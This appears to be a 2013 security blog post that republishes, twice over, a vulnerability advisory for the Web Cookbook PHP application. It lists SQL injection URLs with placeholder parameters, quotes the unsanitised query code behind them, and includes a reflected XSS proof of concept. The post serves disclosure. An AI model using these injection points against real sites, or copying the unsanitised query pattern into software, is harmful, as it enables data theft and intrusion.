Saturday, March 16, 2013
0
An Independent Pakistani Security Researcher Saadat Ullah found Multiple SQL Injection Vulnerabilities on Web Cookbook. Security Researcher also found SQL Injection and XSS vulnerabilities on nconf-1.3, Plogger Gallery and on Mybb Plugin PRO STAT.
Vulnerabilities details are given below:
# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#POC
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
#POC
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
Multiple SQL Injection Vulnerabilities on Web Cookbook found by Security Researcher
An Independent Pakistani Security Researcher Saadat Ullah found Multiple SQL Injection Vulnerabilities on Web Cookbook. Security Researcher also found SQL Injection and XSS vulnerabilities on nconf-1.3, Plogger Gallery and on Mybb Plugin PRO STAT.
Vulnerabilities details are given below:
# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#POC
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
#POC
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
Categories : Vulnerability , Zero Day Vulnerability
Follow @TheHackersPost
About Author:
Nauman Ashraf is a security researcher, developer and blogger. He is Founder and Chief Editor of The Hackers Post. Follow him on
Twitter
Subscribe to:
Post Comments
(
Atom
)
0 Responses to “ Multiple SQL Injection Vulnerabilities on Web Cookbook found by Security Researcher ”
Post a Comment